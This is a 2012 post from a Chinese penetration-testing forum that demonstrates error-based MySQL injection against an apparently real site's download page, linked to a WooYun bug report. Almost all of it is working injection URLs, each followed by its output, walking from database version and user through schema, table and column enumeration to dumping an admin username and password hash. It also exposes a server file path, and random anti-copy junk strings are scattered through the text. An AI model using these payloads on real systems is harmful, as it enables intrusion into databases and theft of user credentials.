中国网络渗透测试联盟

标题: php+mysql高级爆错注入经测算有效 [打印本页]
作者: admin    时间: 2012-9-13 17:52
标题: php+mysql高级爆错注入经测算有效
http://www.wooyun.org/bugs/wooyun-2010-01666
$ o8 ]3 T  f9 r% B$ h
$ ^, L- _4 B2 `8 n/ d5 h* n3 ~之前想找个测试 没想到这有 可以测试下做个记录而已
/ s  J5 D; a. n2 D' s7 x8 B& p+ {! |; p
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003' f5 ^+ g$ B3 m; e  a$ b; A

/ f) A, X+ n0 V8 Z% A2 E5 a/data0/htdocs/leqi_new/app/myapp.php
: n9 Y6 J6 x7 J6 H9 D) R9 |( a0 r" ^8 _+ B
或者, k: j7 N' ]$ i: M8 q8 P7 y1 o
! b. J, Y: k& b3 f
/**********version()**********/ 5.1.49-log6 l' h# f/ A1 v2 X3 }/ w/ Q7 J
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
( k6 X3 [% b+ w: j4 K
# }) y2 r  ?. P% E. y8 W/**********user()**********/  
* b+ M( R0 Z7 ^2 R) p% e" v8 ~8 `http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) m2 M8 Q8 K0 Q. m# \, a6 Y

9 y6 _* b) c- R2 ]0 o' B0 Y/**********database()**********/  leqi! k- n  G6 w' H* y# W  L- R3 ~
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003- i6 s0 z$ H" L5 \! f5 v

* D8 f/ V  ]1 c% U, a/**********limit依次递归爆库**********/; Y- _" y, `6 s( V$ S" C
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) [5 A9 b, J2 ?5 j1 m0 K5 V
information_schema7 T* y" s7 z* B8 O/ }/ M( @' ]
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) `9 _! @4 R: z$ h; ]+ k  \
leqi
7 T8 r8 o' o% u7 D6 z. }& d. bhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003/ I9 }: L4 J$ b$ D
test7 a8 z4 Q0 \+ V; y1 g# p2 I- N7 Q
: |( Y/ e  S. x: |. v
/**********limit依次递归爆表名**********/
4 ?; T+ \7 W. [* B3 ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003( K. v- N. q: s
users4 q8 q" T/ Z  @9 O$ B1 F

/ c. M3 S: V# j6 I2 g& y$ B/**********limit依次递归爆字段名**********/0 ?4 ~, O9 E" h2 H- `- V& c( R
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0030 B4 v5 `; Z0 t
user_id,username,nickname,passwd,group_id
' P+ M* I4 R* z; D) Y/ [: o  M; @http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%239 ~" H0 \/ O! s5 Z2 E, [
/wapc/5000_0005_003
$ F/ c% J' t8 l3 r11 21
8 a# g. {, e2 F+ v+ C9 @4 y1 e! khttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/ c$ _6 v7 a2 j( U; _
/wapc/5000_0005_003) g3 f* B+ ?4 {+ I3 s# o1 @
11 341 351 3614 ?9 t( X5 X$ e( Z
/**********爆数据**********/0 I! u/ e: P% a% _) J
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
% C7 s; `5 b# z. h" Madmin- u- s, z( Z; m
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
. U2 P' i0 v5 n$ v% a6 U- h, K6a8b4574ca231eb8bd52764d4978ffcd; G( [4 p/ O) i! f+ b

. I/ K4 r$ P3 k: j. K7 c  H , E0 e* O& O; k' B& x1 s9 w  ]




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2